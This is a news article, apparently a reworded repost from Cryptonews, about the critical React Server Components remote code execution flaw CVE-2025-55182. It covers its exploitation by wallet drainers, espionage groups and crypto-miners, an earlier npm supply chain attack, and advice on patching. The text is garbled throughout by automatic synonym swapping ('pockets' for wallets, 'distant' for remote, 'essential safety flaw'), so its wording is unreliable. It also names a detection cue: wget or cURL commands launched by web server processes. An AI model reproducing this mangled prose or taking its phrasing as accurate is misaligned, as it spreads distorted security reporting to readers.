Major JavaScript Library Breach Puts All Crypto Websites at Risk
A essential safety flaw in React Server Components has prompted pressing warnings throughout the crypto business, as risk actors are quickly exploiting it to empty wallets and deploy malware.
Security Alliance announced that crypto-drainers are actively weaponizing CVE-2025-55182, urging all web sites to evaluate their front-end code instantly for suspicious belongings.
The vulnerability impacts not solely Web3 protocols however all web sites utilizing React, with attackers focusing on allow signatures throughout platforms.
Users face rapid danger when signing any transaction, as malicious code intercepts pockets communications and redirects funds to attacker-controlled addresses.
Critical Flaw Enables Remote Code Execution
React’s official workforce disclosed CVE-2025-55182 on December 3, score it CVSS 10.0 following Lachlan Davidson’s November 29 report via Meta Bug Bounty.
The unauthenticated distant code execution vulnerability exploits how React decodes payloads despatched to Server Function endpoints, permitting attackers to craft malicious HTTP requests that execute arbitrary code on servers.
The flaw impacts React variations 19.0, 19.1.0, 19.1.1, and 19.2.0 throughout react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack packages.
Major frameworks, together with Next.js, React Router, Waku, and Expo, require rapid updates. Patches arrived in variations 19.0.1, 19.1.2, and 19.2.1, with Next.js customers needing upgrades throughout a number of launch strains from 14.2.35 via 16.0.10.
Unfortunately, the researchers have once more detected two main new flaws.
Vercel deployed Web Application Firewall guidelines to robotically defend tasks on its platform, although the corporate emphasised that WAF safety alone stays inadequate.
“Immediate upgrades to a patched model are required,” Vercel stated in its December 3 safety bulletin, including that the vulnerability impacts purposes that course of untrusted enter in ways in which allow distant code execution.
Multiple Threat Groups Launch Coordinated Attacks
Google Threat Intelligence Group documented widespread assaults starting on December 3, monitoring prison teams starting from opportunistic hackers to government-backed operations.
Chinese hacking teams put in varied malware varieties on compromised techniques, primarily focusing on cloud servers on Amazon Web Services and Alibaba Cloud.
These attackers employed refined strategies to keep up long-term entry to sufferer techniques.
Some teams put in software program creating secret tunnels for distant management, whereas others deployed applications that constantly obtain further malicious instruments disguised as respectable information. The malware hides in system folders and robotically restarts to keep away from detection.
Several teams disguised malicious software program as widespread applications or used respectable cloud companies, similar to Cloudflare Pages and GitLab, to cover their communications.
Financially motivated criminals joined the assault wave beginning on December 5, putting in crypto-mining software program that secretly makes use of victims’ computing energy to generate Monero.
These miners run always within the background, driving up electrical energy prices whereas producing income for attackers. Underground hacking boards rapidly stuffed with discussions sharing assault instruments and exploitation experiences.
Historic Supply Chain Attack Pattern Continues
The React vulnerability follows a September 8 attack in which hackers compromised Josh Goldberg’s npm account and printed malicious updates to 18 broadly used packages, together with chalk, debug, and strip-ansi.
These utilities collectively account for over 2.6 billion weekly downloads, and researchers have found crypto-clipper malware that intercepts browser capabilities to swap respectable pockets addresses with attacker-controlled ones.
Ledger CTO Charles Guillemet described that incident as a “large-scale provide chain assault,” advising customers with out {hardware} wallets to keep away from on-chain transactions.
The attackers gained entry via phishing campaigns impersonating npm assist, claiming accounts can be locked except two-factor authentication credentials have been up to date by September 10.
Hackers are stealing extra crypto and shifting it sooner. One laundering course of took solely 2 minutes 57 seconds. Can the business cope?#CryptoSecurity #Web3 #Blockchain #DeFihttps://t.co/lGwutYsT6Q
— Cryptonews.com (@cryptonews) August 12, 2025
Global Ledger data shows hackers stole over $3 billion across 119 incidents within the first half of 2025, with 70% of breaches involving funds being moved earlier than they turned public.
Only 4.2% of stolen belongings have been recovered, as laundering now takes seconds reasonably than hours.
For now, organizations utilizing React or Next.js are suggested to patch instantly to variations 19.0.1, 19.1.2, or 19.2.1, deploy WAF guidelines, audit all dependencies, monitor community site visitors for wget or cURL instructions initiated by internet server processes, and hunt for unauthorized hidden directories or malicious shell configuration injections.
The publish Major JavaScript Library Breach Puts All Crypto Websites at Risk appeared first on Cryptonews.
